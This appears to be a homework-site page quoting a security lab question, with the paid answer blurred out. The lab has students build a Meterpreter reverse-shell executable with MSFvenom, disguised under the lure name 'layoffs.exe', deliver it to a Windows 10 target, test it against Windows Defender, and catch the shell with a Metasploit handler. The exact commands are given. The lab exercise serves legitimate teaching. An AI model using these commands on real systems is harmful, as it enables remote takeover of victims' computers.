Answered step by step
Verified Expert Solution
Link Copied!

Question

1 Approved Answer

In this part of the lab, you create a malicious payload using MSFvenom. The payload will be copied (USB, email, Kali VM-> Host -> Windows

In this part of the lab, you create a "malicious" payload using MSFvenom. The payload will be copied (USB, email, Kali VM-> Host -> Windows VM, etc.) to the Windows 10 target. You will execute the payload on the Windows 10 target with Windows Defender disabled first. This will prove your payload is working. Next, you will enable Windows Defender and try to execute the payload again.

To generate the payload, you will use this:

msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=X.X.X.X LPORT=53 -f exe -o layoffs.exe

To enable the handler, you will use this:

msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set lport 53

Step by Step Solution

There are 3 Steps involved in it

Step: 1

blur-text-image

Get Instant Access to Expert-Tailored Solutions

See step-by-step solutions with expert insights and AI powered tools for academic success

Step: 2

blur-text-image_2

Step: 3

blur-text-image_3

Ace Your Homework with AI

Get the answers you need in no time with our AI-driven, step-by-step assistance

Get Started

Recommended Textbook for

Advanced Database Systems

Authors: Carlo Zaniolo, Stefano Ceri, Christos Faloutsos, Richard T. Snodgrass, V.S. Subrahmanian, Roberto Zicari

1st Edition

155860443X, 978-1558604438

More Books

Students also viewed these Databases questions